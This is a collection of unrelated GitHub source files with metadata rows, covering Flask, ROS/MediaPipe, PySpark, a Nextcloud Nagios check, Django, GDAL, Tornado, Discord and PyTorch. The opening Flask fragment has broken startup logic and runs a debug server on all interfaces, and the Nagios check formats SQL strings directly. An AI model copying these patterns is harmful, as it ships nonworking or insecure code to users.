occ_husb_5 = float(request.form["occ_husb_5"])
occ_husb_6 = float(request.form["occ_husb_6"])
rate_marriage = float(request.form["rate_marriage"])
age = float(request.form["age"])
yrs_married = float(request.form["yrs_married"])
children = float(request.form["children"])
religious = float(request.form["religious"])
educ = float(request.form["educ"])
data = np.array([[Intercept, occ_2, occ_3, occ_4, occ_5,
occ_6, occ_husb_2, occ_husb_3, occ_husb_4, occ_husb_5, occ_husb_6, rate_marriage
, age, yrs_married, children, religious, educ]])
my_prediction = classifier.predict(data)
return render_template(prediction=my_prediction)
if __name__ == "__main__":
clntApp = ClientApi()
app = app.run()
host = '0.0.0.0'
port = 5000
app.run(debug=True)
httpd = simple_server.make_server(host, port, app)
print("Serving on %s %d" % (host, port))
httpd.serve_forever()
| amitranjasahoo12/logistics-regression | app.py | app.py | py | 2,548 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.app",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask.app",
"line_number": ... |
2954317677 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python標準ライブラリ
import cv2
from cv_bridge import CvBridge, CvBridgeError
# Python追加ライブラリ
import mediapipe as mp
# ROSに関するライブラリ
import rospy
from sensor_msgs.msg import CompressedImage
class HandDetection():
def __init__(self):
# MediaPipeが提供しているhandsの値を読み込む
self.mp_hands = mp.solutions.hands
self.mp_drawing = mp.solutions.drawing_utils
self.mesh_drawing_spec = self.mp_drawing.DrawingSpec(thickness=2, color=(0, 255, 0))
self.mark_drawing_spec = self.mp_drawing.DrawingSpec(thickness=3, circle_radius=3, color=(0, 0, 255))
self.cv_bridge = CvBridge()
self.sub = rospy.Subscriber("/hsrb/head_rgbd_sensor/rgb/image_rect_color/compressed", CompressedImage, self.main)
def main(self, msg):
observed_img = self.cv_bridge.compressed_imgmsg_to_cv2(msg)
image = cv2.resize(observed_img, dsize=None, fx=0.3, fy=0.3)
# 色変換(BGR→RGB)
rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# リサイズ
height = rgb_image.shape[0]
width = rgb_image.shape[1]
# 検出結果を別の画像名としてコピーして作成
self.annotated_image = image.copy()
# 認識する手の数と認識精度を設定する (手の数の上限、検出精度、ランドマーク検出)
with self.mp_hands.Hands(max_num_hands=2, min_detection_confidence=0.5,
static_image_mode=True) as hands_detection:
# 顔検出の結果をresultsに
results = hands_detection.process(rgb_image)
for hand_landmarks in results.multi_hand_landmarks:
self.mp_drawing.draw_landmarks(
image=self.annotated_image,
landmark_list=hand_landmarks,
connections=self.mp_hands.HAND_CONNECTIONS,
landmark_drawing_spec=self.mark_drawing_spec,
connection_drawing_spec=self.mesh_drawing_spec
)
self.save_data(self.annotated_image)
cv2.imshow('Detection Result', self.annotated_image)
cv2.waitKey(1)
def save_data(self, img):
cv2.imwrite('../data/result_ros.jpg', img)
return
if __name__ == "__main__":
rospy.init_node('mediapipe_ros')
mediapipe_ros = HandDetection()
rospy.spin()
| Shoichi-Hasegawa0628/mediapipe_ros | src/main_ros.py | main_ros.py | py | 2,503 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mediapipe.solutions",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "mediapipe.solutions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "cv_bridge.CvBridge",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "... |
31916197135 | #!/usr/bin/env python
# coding: utf-8
# # Technical test results for HEVA company
# This notebook repeats the statement of the test. Under each activity you will find the code and the result produced.
# You will find all the requirements to run this notebook in the requirements.md file.
# ## Configuration
# ### 1. Importing packages
# In[1]:
# Import necessary modules
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
from pyspark.sql.functions import col, when, explode, split, desc, from_unixtime, year
from pyspark.sql.types import DateType
import time
import sys
import contextlib
# ### 2. Settings
# In[2]:
# Definition of necessary parameters
data_path = "../sources/data/movies.sqlite"
output_log_path = "result.log"
# In[3]:
class Logger:
def __init__(self, filename):
self.console = sys.stdout
self.file = open(filename, 'a')
def write(self, message):
self.console.write(message)
self.file.write(message)
def flush(self):
self.console.flush()
self.file.flush()
# ### 3. Reading data
# In[4]:
def read_data(data_path):
""" Configuring the Pyspark session with the jdbc package
to read the "movies.sqlite" file.
Args:
data_path (string): The sqlite data file path
Returns:
tuple: A tuple of 2 Pyspark Dataframes
"""
# Creation of the Spark session
spark = SparkSession.builder .config(
'spark.jars.packages',
'org.xerial:sqlite-jdbc:3.34.0')\
.getOrCreate()
# Reading the movies table
df_movies = spark.read.format('jdbc') .options(
driver='org.sqlite.JDBC',
dbtable='movies',
url=f'jdbc:sqlite:{data_path}')\
.load()
# Reading the ratings table
df_ratings = spark.read.format('jdbc') .options(
driver='org.sqlite.JDBC',
dbtable='ratings',
url=f'jdbc:sqlite:{data_path}')\
.load()
return df_movies, df_ratings
with contextlib.redirect_stdout(Logger(output_log_path)):
df_movies, df_ratings = read_data(data_path)
# ### 4. Data overview
# In[5]:
def preview_data(df_movies, df_ratings):
"""Showing top 20 rows
Args:
df_movies (Dataframe): Movies Dataframe
df_ratings (Dataframe): Ratings Dataframe
"""
# Overview of movies table data
print("Movies table")
df_movies.show()
# Preview data from the ratings table
print("Ratings table")
df_ratings.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
preview_data(df_movies, df_ratings)
# ## Tasks
#
# ### 1. Counts
#
# - 1.1 How many films are in the database?
# In[6]:
def activity_1_1(df_movies):
"""Counting the number of distinct film titles
Args:
df_movies (Dataframe): Movies Dataframe
Return:
int: Number of movies
"""
return df_movies .select("title") .distinct() .count()
with contextlib.redirect_stdout(Logger(output_log_path)):
result_1_1 = activity_1_1(df_movies)
print("There are", result_1_1, "movies in the database")
# - 1.2 How many different users are in the database?
# In[7]:
def activity_1_2(df_ratings):
"""Counting the number of distinct user id
Args:
df_ratings (Dataframe): Ratings Dataframe
Return:
int: Number of user id
"""
return df_ratings .select("user_id") .distinct() .count()
with contextlib.redirect_stdout(Logger(output_log_path)):
result_1_2 = activity_1_2(df_ratings)
print("There are", result_1_2, "user id in the database")
# - 1.3 What is the distribution of the notes provided?
# **Bonus**: create a histogram.
# In[8]:
def activity_1_3(df_ratings):
""" Display rating distribution histogramme
Counting the number of voters per rating
Sorting based on ratings
Args:
df_ratings (Dataframe): Ratings Dataframe
"""
# Creation of the histogram
print("Converting Dataframe to Pandas...")
plt.hist(
df_ratings.select("rating").toPandas().squeeze(),
bins=11) # [0 to 10] => 11 values
plt.xlabel('Rating')
plt.ylabel('Number of rating')
plt.title('Histogram of rating')
plt.show()
print("Ratings distribution")
df_ratings .groupBy("rating") .count() .orderBy("rating") .show()
with contextlib.redirect_stdout(Logger(output_log_path)):
activity_1_3(df_ratings)
# - 1.4 Finally, we want to obtain a table of frequencies to express the distribution of notes as a percentage.
# In[9]:
def activity_1_4(df_ratings):
""" Added column count which represents the number of voters
by notes.
Added a percentage column,
which is a transformation of the count column into a percentage.
Selection of rating and percentage columns.
Sort by rating column.
Args:
df_ratings (Dataframe): Rating Dataframe
"""
df_ratings.groupBy("rating") .count() .withColumn(
'percentage',
(col("count")*100)/float(df_ratings.count()))\
.select("rating", "percentage")\
.orderBy("rating")\
.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Ratings frequencies")
activity_1_4(df_ratings)
# ### 2. Data selection and enrichment
#
# - 2.1 In order to set up a certain statistical model, we must transform the `rating` note into two modalities: did the user like the film or not?
# Create a new `liked` column in the `ratings` table with the following values: `0` for ratings [0-6] and `1` for ratings [7-10].
# In[10]:
def activity_2_1(df_ratings):
""" Added a liked column.
Depending on the rating column,
the liked column takes the value 0 or 1
Args:
df_ratings (Dataframe): Ratings Dataframe
Returns:
Dataframe: Updated ratings Dataframe
"""
df_ratings = df_ratings .withColumn(
'liked',
when(df_ratings.rating < 7, 0)
.when(df_ratings.rating >= 7, 1))
df_ratings.show()
return df_ratings
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Updated ratings Dataframe")
df_ratings = activity_2_1(df_ratings)
# - 2.2 Which genres are rated highest by users? We want to get the **top 10** movie genres liked by users (using the new `liked` column).
# In[11]:
def activity_2_2(df_movies, df_ratings):
""" Separation of genres in an array with the split function.
Extract genre arrays with the explode function alias explode_genre.
Selection of the movie_id and explode_genre column.
Joining with ratings table on movie_id columns.
Sum of the liked column by grouping on the explode_genre column.
Rename sum(liked) column to sum_liked.
Rename explode_genre column to genre.
Sort in descending order based on the sum_liked column.
Limitation to the first 10 records.
Args:
df_movies (Dataframe): Movies Dataframe
df_ratings (Dataframe): Ratings Dataframe
"""
df_movies.select(
"movie_id",
explode(
split(
col("genre"),
"\|"))
.alias("explode_genre"))\
.join(
df_ratings,
df_ratings.movie_id == df_movies.movie_id,
"inner")\
.groupBy("explode_genre")\
.sum("liked")\
.withColumnRenamed("sum(liked)", "sum_liked")\
.withColumnRenamed("explode_genre", "genre")\
.sort(desc("sum_liked"))\
.limit(10)\
.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Top 10 genres")
activity_2_2(df_movies, df_ratings)
# ### 3. Advanced Selections
#
# - 3.1 What are the titles of the films most popular with Internet users?
# We are looking for the **10** films with the best ratings on average by users, with a minimum of **5** ratings for the measurement to be relevant.
# In[12]:
def activity_3_1(df_movies, df_ratings):
""" Join between movies and ratings tables,
on movie_id columns, alias movies_ratings.
Join with subtable alias title_count,
which represents the number of votes per film.
Filter on movies that have at least 5 ratings.
Average ratings per movie title.
Renamed avg(rating) column to mean_rating.
Descending sort based on mean_rating column.
Limitation to the first 10 records.
Args:
df_movies (Dataframe): Movies Dataframe
df_ratings (Dataframe): Ratings Dataframe
"""
df_movies.join(
df_ratings,
df_movies.movie_id == df_ratings.movie_id,
"inner").alias("movies_ratings")\
.join(
(df_movies.join(
df_ratings,
df_movies.movie_id == df_ratings.movie_id,
"inner")
.groupBy("title")
.count()).alias("title_count"),
col("movies_ratings.title") == col("title_count.title"),
"inner")\
.filter(col("count") >= 5)\
.groupBy("movies_ratings.title")\
.mean("rating")\
.withColumnRenamed("avg(rating)", "mean_rating")\
.sort(desc("mean_rating"))\
.limit(10)\
.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Top 10 movies")
activity_3_1(df_movies, df_ratings)
# - 3.2 What is the most rated film in 2020?
# **Note**: the `rating_timestamp` column is provided in the database as [Unix time](https://fr.wikipedia.org/wiki/Heure_Unix).
# In[13]:
def activity_3_2(df_movies, df_ratings):
""" Adding a rating_year column,
which corresponds to the year in which the vote was recorded.
Join movies and ratings tables on movie_id columns.
Counting the number of votes per film title.
Sort descending in order of count.
Rename column count to rating_count.
Limitation to the first record.
Args:
df_movies (Dataframe): Movies Dataframe
df_ratings (Dataframe): Ratings Dataframe
"""
df_ratings .withColumn(
'rating_year',
year(
from_unixtime('rating_timestamp')
.cast(DateType())))\
.join(
df_movies,
df_ratings.movie_id == df_movies.movie_id)\
.filter(col("rating_year") == 2020)\
.groupBy("title")\
.count()\
.sort(desc("count"))\
.withColumnRenamed("count", "rating_count")\
.limit(1)\
.show()
with contextlib.redirect_stdout(Logger(output_log_path)):
print("Best film of the year 2020")
activity_3_2(df_movies, df_ratings)
# ### 4. Data management
#
# - 4.1 In order to find the notes of a particular user more quickly, we want to set up an index on the user ids.
# Do you see a performance difference when looking up the ratings given by user `255`?
# > Spark DataFrames are inherently unordered and do not support random access. (There is no built-in index concept like there is in pandas). Each row is treated as an independent collection of structured data, and this is what enables distributed parallel processing. So any executor can take any block of data and process it regardless of row order. [More info here](https://stackoverflow.com/questions/52792762/is-there-a-way-to-slice-dataframe-based-on-index-in-pyspark)
#
# Instead we can order the pyspark ratings dataframe according to the 'user_id' column. Otherwise the koalas package can be an alternative. Because Koala supports indexes and can be used for big data. Also, pandas cannot be scaled for big data oriented use.
#
# To check performance, I created the function time_test which print the execution time of a function.
# In[14]:
def time_test(func):
""" Check function time performance.
Args:
func (function): A function name
"""
time_list = []
for i in range(100):
start_time = time.time()
# beginning of the code to test
func()
# end of the code to test
time_list.append(time.time() - start_time)
mean_time = sum(time_list) / len(time_list)
max_time = max(time_list)
min_time = min(time_list)
print("min:", min_time, "mean:", mean_time, "max:", max_time, end="\n\n")
# In[15]:
def activity_4_1(df_ratings):
"""Compare time perfomance for indexed and not indexed Dataframe
Args:
df_ratings (Dataframe): Ratings Dataframe
"""
df_ratings_indexed = df_ratings.orderBy("user_id")
print("Converting Dataframe to Pandas...")
pandas_df_ratings = df_ratings.toPandas()
pandas_df_ratings_indexed = pandas_df_ratings.set_index("user_id")
print("Execution time for unindexed PYSPARK dataframe")
time_test(lambda: df_ratings.filter(col("user_id") == 255))
print("Execution time for PYSPARK dataframe indexed by 'user_id'")
time_test(lambda: df_ratings_indexed.filter(col("user_id") == 255))
print("Execution time for unindexed PANDAS dataframe")
time_test(
lambda: pandas_df_ratings
.loc[pandas_df_ratings.loc[:, "user_id"] == 255])
print("Execution time for PANDAS dataframe indexed by 'user_id'")
time_test(lambda: pandas_df_ratings_indexed.loc[255])
with contextlib.redirect_stdout(Logger(output_log_path)):
activity_4_1(df_ratings)
# #### Ranking:
# 1. Indexed Pandas Dataframe
# 2. Unindexed Pandas Dataframe
# 3. Indexed Pyspark Dataframe / Unindexed Pyspark Dataframe
# ## Code quality check
# In[16]:
get_ipython().system('flake8-nb result.ipynb')
# ## Safe notebook versioning
# In[17]:
get_ipython().system('jupyter nbconvert result.ipynb --to="python"')
# ## PDF export
# In[ ]:
get_ipython().system('jupyter nbconvert --to webpdf --allow-chromium-download result.ipynb')
| mdavid674/TEST_HEVA | main/result.py | result.py | py | 14,008 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdout",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession.builder.config",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 72,
"usage_type": "attribute"
... |
69903435304 | #!/usr/bin/env python
#
# A script that check fulltextsearch queue in nextcloud
# This works only for Postgres Backend
#
#
# Main Author
# - Filip Krahl <filip.krahl@t-systems.com>
#
# USAGE
#
# See README.md
#
from optparse import OptionParser
import sys
import time
import re
import os
import numbers
try:
import psycopg2
except ImportError as e:
print(e)
sys.exit(2)
def performance_data(perf_data, params):
data = ''
if perf_data:
data = " |"
for p in params:
p += (None, None, None, None)
param, param_name, warning, critical = p[0:4]
data += "%s=%s" % (param_name, str(param))
if warning or critical:
warning = warning or 0
critical = critical or 0
data += ";%s;%s" % (warning, critical)
data += " "
return data
def numeric_type(param):
return param is None or isinstance(param, numbers.Real)
def check_levels(param, warning, critical, message, ok=[]):
if (numeric_type(critical) and numeric_type(warning)):
if warning >= critical:
print("WARNING - The warning threshold is greater than critical threshold")
sys.exit(1)
elif param >= critical:
print("CRITICAL - " + message)
sys.exit(2)
elif param >= warning:
print("WARNING - " + message)
sys.exit(1)
else:
print("OK - " + message)
sys.exit(0)
else:
if param in critical:
print("CRITICAL - " + message)
sys.exit(2)
if param in warning:
print("WARNING - " + message)
sys.exit(1)
if param in ok:
print("OK - " + message)
sys.exit(0)
# unexpected param value
print("CRITICAL - Unexpected value : %d" % param + "; " + message)
return 2
def main(argv=None):
p = OptionParser()
p.add_option('-H', '--host', action='store', type='string', dest='host', default='127.0.0.1', help='The hostname of postgres database')
p.add_option('-d', '--database', action='store', type='string', dest='database', default='postgres', help='The nextcloud database the fulltextsearch table is inside')
p.add_option('-t', '--tableprefix', action='store', type='string', dest='tableprefix', default='oc', help='Tableprefix for the nextcloud database')
p.add_option('-u', '--user', action='store', type='string', dest='user', default='nextcloud', help='The user which has access to nextcloud database')
p.add_option('-p', '--password', action='store', type='string', dest='password', default='', help='The password of nextcloud db user')
p.add_option('-P', '--port', action='store', type='string', dest='port', default='5432', help='The port of nextcloud database')
p.add_option('-D', '--perf-data', action='store_true', dest='perf_data', default=False, help='Enable output of Nagios performance data')
p.add_option('-A', '--action', type='choice', dest='action', default='connect', help='The action the script should execute',
choices=['fts_queue', 'fts_errors', 'connect']
)
p.add_option('-w', '--warning', action='store', dest='warning', default=None, help='Warning threshold')
p.add_option('-c', '--critical', action='store', dest='critical', default=None, help='Critical threshold')
options, arguments = p.parse_args()
host = options.host
database = options.database
tableprefix = options.tableprefix
user = options.user
password = options.password
port = options.port
perf_data = options.perf_data
action = options.action
warning = int(options.warning or 0)
critical = int(options.critical or 0)
# connect to the databse, create cursor and determine connection time
start = time.time()
con = psycopg2.connect(database=database, user=user, password=password, host=host, port=port)
cur = con.cursor()
conn_time = time.time() - start
if action == "fts_queue":
return check_fts_queue(cur, warning, critical, perf_data, tableprefix)
elif action == "fts_errors":
return check_fts_error(cur, warning, critical, perf_data, tableprefix)
else:
return check_connect(host, port, database, user, password, warning, critical, conn_time, perf_data)
def check_connect(host, port, database, user, password, warning, critical, conn_time, perf_data):
warning = warning or 3
critical = critical or 6
message = "Connection took %.3f seconds" % conn_time
message += performance_data(perf_data, [(conn_time, "connection_time", warning, critical)])
return check_levels(conn_time, warning, critical, message)
def check_fts_queue(cur, warning, critical, perf_data, tableprefix):
warning = warning or 10
critical = critical or 50
select = "select * from {}_fulltextsearch_indexes where status != 1;".format(tableprefix)
cur.execute(select)
rows = cur.fetchall()
fts_queue = 0
for row in rows:
fts_queue += 1
message = "Documents in queue: %d" % fts_queue
message += performance_data(perf_data, [("%d" % fts_queue, "documents_pending", warning, critical)])
cur.close()
return check_levels(fts_queue, warning, critical, message)
def check_fts_error(cur, warning, critical, perf_data, tableprefix):
warning = warning or 1
critical = critical or 2
select = "select * from {}_fulltextsearch_indexes where err != 0;".format(tableprefix)
cur.execute(select)
rows = cur.fetchall()
fts_errors = 0
for row in rows:
fts_errors += 1
message = "Index errors: %d" % fts_errors
message += performance_data(perf_data, [("%d" % fts_errors, "index_erros", warning, critical)])
cur.close()
return check_levels(fts_errors, warning, critical, message)
con.close()
if __name__ == "__main__":
main(sys.argv) | FLiPp3r90/nextcloud_fulltextsearch_pg | nextcloud_fulltextsearch_pg.py | nextcloud_fulltextsearch_pg.py | py | 5,947 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.exit",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numbers.Real",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 59,... |
74768118503 | from django.http import HttpRequest
from djaveAllowed.models import Allowed
from djaveAllowed.credentials import UserCredentials
from djaveAPI.get_instance import get_instance
from djaveAPI.problem import Problem
from djaveClassMagic.find_models import model_from_name
def get_request_ajax_obj(request, model=None, pk=None):
if not pk:
# It's awfully confusing if I'm using id or pk, so I just make them both
# work.
pk = get_request_variable(request, 'id', required=False)
if not pk:
pk = get_request_variable(request, 'pk', required=True)
model_name = None
if model:
model_name = model.__name__
else:
# It's awfully confusing if I'm using model or type, so I just make them
# both work.
model_name = get_request_variable(request.POST, 'model', required=False)
if not model_name:
model_name = get_request_variable(request.POST, 'type', required=True)
# I'm very intentionally NOT using djaveAPI.get_publishable_model because
# this is AJAX and you can do AJAX calls on objects that aren't necessarily
# in the API. The only thing you actually need here is a model I can check
# permission on.
model = model_from_name(model_name, Allowed)
credentials = UserCredentials(request.user)
# model.live is really handy for pulling back a list of active objects. This
# requires a single object and I don't want to outsmart myself, so I'm just
# using model.objects
return get_instance(model_name, model.objects, pk, credentials)
def get_request_variable(data, variable_name, required=True):
""" data can be a dictionary such as request.POST, or it can just be a
request. """
if isinstance(data, HttpRequest):
data = get_data_from_request(data)
if variable_name not in data:
if required:
raise Problem(
'This request doesn\'t specify a {}'.format(variable_name))
return None
variable = data[variable_name]
if required and variable in [None, '']:
raise Problem('The {} is required'.format(variable_name))
return variable
def get_data_from_request(request):
return request.POST or request.PUT or request.DELETE
| dasmith2/djaveAPI | djaveAPI/get_request_variable.py | get_request_variable.py | py | 2,142 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "djaveClassMagic.find_models.model_from_name",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "djaveAllowed.models.Allowed",
"line_number": 29,
"usage_type": "argument"
},
{
"api_name": "djaveAllowed.credentials.UserCredentials",
"line_number": 30,
... |
43911039109 | import numpy as n
import matplotlib.pyplot as plt
v0 = float(input("Podaj V0: "))
katpierwszy = float(input("Podaj kat: ")) * n.pi / 180
kat = katpierwszy* n.pi / 180
time = 2 * v0 * n.sin(kat) / 9.81
hmax = v0**2 * n.sin(kat)**2 / (2 * 9.81)
zasieg = 2 * v0**2 * n.sin(kat)**2 / 9.81
punkty = 100
t = n.linspace(0, time, punkty)
vx = [v0 * n.cos(kat) for i in range(punkty)]
vy = v0 * n.sin(kat) - 9.81 * t
x = vx * t
y = v0 * t * n.sin(kat) - 9.81 * t * t / 2
print("Maksymalna wysokość: ",hmax)
print("Zasieg rzutu: ",zasieg)
print("Czas lotu: ",time)
plt.subplot(131, title="predkosc chwilowa")
plt.plot(t, vx, t, vy)
plt.subplot(132, title="polozenie funkcji w czasie")
plt.plot(t, x, t, y)
plt.subplot(133, title="tor ruchu w rzucie ukosnum ")
plt.plot(x, y)
plt.show()
| AWyszynska/JSP2022 | lista9/zadanie3.py | zadanie3.py | py | 796 | python | pl | code | 0 | github-code | 36 | [
{
"api_name": "numpy.pi",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "numpy.pi",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.sin",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number": 9,
... |
506102860 | """
Split Raster's into tiles
"""
import os
from osgeo import gdal
def nrsts_fm_rst(rst, rows, cols, out_fld, bname):
"""
Split raster into several rasters
The number of new rasters will be determined by the extent of the
raster and the maximum number of rows and cols that the new
rasters could have.
"""
from glass.prop.img import rst_epsg
from glass.wt.rst import ext_to_rst
# Open Raster
img = gdal.Open(rst, gdal.GA_ReadOnly)
# Get EPSG
epsg = rst_epsg(img)
# Get raster cellsize
tlx, csx, xr, tly, yr, csy = img.GetGeoTransform()
# Get Raster cols and Rows
rrows, rcols = img.RasterYSize, img.RasterXSize
# Get Raster max X and min Y (bottom right)
rmax_x = tlx + (rcols * csx)
rmin_y = tly + (rrows * csy)
# Get Number of rasters to be created
nr_rows = int(rrows / rows)
nr_rows = nr_rows if nr_rows == rrows / rows else nr_rows + 1
nr_cols = int(rcols / cols)
nr_cols = nr_cols if nr_cols == rcols / cols else nr_cols + 1
# Create new rasters
newrst = []
for i in range(nr_rows):
# TopLeft Y
_tly = tly + ((rows * csy) * i)
# BottomRight Y
_bry = _tly + (csy * rows)
# If fishnet min y is lesser than raster min_y
# Use raster min_y
if _bry < rmin_y:
_bry = rmin_y
for e in range(nr_cols):
# TopLeft X
_tlx = tlx + ((cols * csx) * e)
# Bottom Right X
_brx = _tlx + (csx * cols)
# If fishnet max x is greater than raster max_x
# Use raster max_x
if _brx > rmax_x:
_brx = rmax_x
# Create Raster
nrst = ext_to_rst(
(_tlx, _tly), (_brx, _bry),
os.path.join(out_fld, f"{bname}_{str(i)}{str(e)}.tif"),
cellsize=csx, epsg=epsg, rstvalue=1
)
newrst.append(nrst)
return newrst
def split_raster_by_window(rst, ntile_rows, ntile_cols, out_fld):
"""
Split Raster By Spatial Window
"""
from glass.pys import execmd
from glass.pys.oss import fprop
from glass.prop.df import drv_name
# Open Raster
img = gdal.Open(rst, gdal.GA_ReadOnly)
# Get Raster cols and Rows
rrows, rcols = img.RasterYSize, img.RasterXSize
# Driver
drv = drv_name(rst)
# Basename
fp = fprop(rst, ['ff', 'fn'])
fn, ff = fp['filename'], fp['fileformat']
# Create new subrasters
nc = 0
res = []
for c in range(0, rcols, ntile_cols):
nr = 0
for r in range(0, rrows, ntile_rows):
outrst = os.path.join(
out_fld,
f'{fn}_r{str(nr)}c{str(nc)}{ff}'
)
cmd = (
f'gdal_translate -of {drv} '
f'-srcwin {str(c)} {str(r)} '
f'{str(ntile_cols)} {str(ntile_rows)} '
f'{rst} {outrst}'
)
rcmd = execmd(cmd)
res.append(outrst)
nr += 1
nc += 1
return res
| jasp382/glass | glass/dtt/rst/split.py | split.py | py | 3,146 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "osgeo.gdal.Open",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "osgeo.gdal.GA_ReadOnly",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "glass.prop.img... |
36050038659 | from typing import Optional
from tornado.template import Loader
from web.controllers.utils.errors import handle_errors
from web.controllers.utils.validated import ValidatedFormRequestHandler
from web.schemas import template_schema
from web.services.email.abstract import AbstractEmailService
from web.validation import validate_template_schema
class BaseTemplateRequestHandler(ValidatedFormRequestHandler):
def initialize(self, template_loader: Loader, email_service: AbstractEmailService):
self.service = email_service
self.loader = template_loader
class TemplatesHandler(BaseTemplateRequestHandler):
schemas = {"post": template_schema}
@handle_errors
async def get(self):
contacts = await self.service.list_email_templates()
self.write(
self.loader.load("templates/templates.html").generate(
objects=contacts, columns=["id", "name"], url_base="/templates/"
)
)
@handle_errors
async def post(self):
data = self.get_data("post")
validate_template_schema(data)
template = await self.service.create_email_template(data)
self.redirect(f"/templates/{template['id']}")
class TemplateHandler(BaseTemplateRequestHandler):
schemas = {"post": template_schema}
@handle_errors
async def get(self, template_id: str):
template = await self.service.get_email_template(int(template_id))
self.write(
self.loader.load("templates/template.html").generate(template=template)
)
@handle_errors
async def post(self, template_id: str):
data = self.get_data("post")
validate_template_schema(data)
data["id"] = int(template_id)
await self.service.update_email_template(data)
await self.get(template_id)
class TemplateFormHandler(BaseTemplateRequestHandler):
@handle_errors
async def get(self, template_id: Optional[str] = None):
if template_id:
action = f"/templates/{template_id}"
initial = await self.service.get_email_template(int(template_id))
else:
action = "/templates"
initial = {}
self.write(
self.loader.load("templates/template_form.html").generate(
action=action, initial=initial
)
)
| MFrackowiak/sc_r_mailmarketing | web/controllers/template.py | template.py | py | 2,346 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "web.controllers.utils.validated.ValidatedFormRequestHandler",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "tornado.template.Loader",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "web.services.email.abstract.AbstractEmailService",
"line_... |
2623856397 | import discord
import logging
import os
from discord.ext import commands
logger = logging.getLogger('serverlinker')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
initial_extensions = [
'plugins.commands',
'plugins.handlers'
]
bot = commands.AutoShardedBot(command_prefix=commands.when_mentioned_or('$'))
logger.info("""
_________ .____ .__ __
/ _____/ ______________ __ ___________| | |__| ____ | | __ ___________
\_____ \_/ __ \_ __ \ \/ // __ \_ __ \ | | |/ \| |/ // __ \_ __ \\
/ \ ___/| | \/\ /\ ___/| | \/ |___| | | \ <\ ___/| | \/
/_______ /\___ >__| \_/ \___ >__| |_______ \__|___| /__|_ \\\\___ >__|
\/ \/ \/ \/ \/ \/ \/
""")
logger.info("Created by Kelwing#0001")
if __name__ == '__main__':
for ext in initial_extensions:
try:
logger.info(f"Loading {ext}...")
bot.load_extension(ext)
except Exception as e:
logger.exception(f'Failed to load extension {ext}.')
@bot.event
async def on_ready():
game = discord.Game(f"Type $help "
f"| Serving {len(bot.guilds)} guilds on "
f"{bot.shard_count} shards")
await bot.change_presence(activity=game)
logger.info(f"{bot.user} is now online!")
bot.run(os.environ.get('TOKEN'), reconnect=True)
| Kelwing/DiscordLinkerBot | main.py | main.py | py | 1,599 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "logging.Forma... |
72597561384 | from torch import nn
import torch
class OrderPredictor(nn.Module):
def __init__(self, model_dim):
super().__init__()
self.disc_linear = nn.ModuleList([
nn.Linear(2 * model_dim, model_dim) for _ in range(3)
])
self.final_linear = nn.Linear(3 * model_dim, 6)
def forward(self, features):
# features in (batch_size * sampled_num, 3, dim)
res_01 = self.disc_linear[0](torch.cat((features[:, 0], features[:, 1]), dim=-1))
res_02 = self.disc_linear[1](torch.cat((features[:, 0], features[:, 2]), dim=-1))
res_12 = self.disc_linear[2](torch.cat((features[:, 1], features[:, 2]), dim=-1))
res = torch.cat((res_01, res_02, res_12), dim=-1)
return self.final_linear(res) # in (bs * sampled_num, 6)
def order2target(order):
return {'012': 0, '021': 1, '102': 2, '120': 3, '201': 4, '210': 5}[str(order[0]) + str(order[1]) + str(order[2])] | AwalkZY/CPN | model/sub_modules/auxiliary.py | auxiliary.py | py | 937 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleList",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
18315390523 | # This script does the following:
#
# 1. Steps through all of the shapefiles associated with the aerial photos and
# determines whether the shapefile falls entirely within in the fjord. Photos
# that don't fall entirely within the fjord are excluded from analysis. A file
# titled 'input_files.npy' is created that contains the list of photos to be
# processed.
#
# 2. Steps through all of the photos in the 'input_files.npy' file and
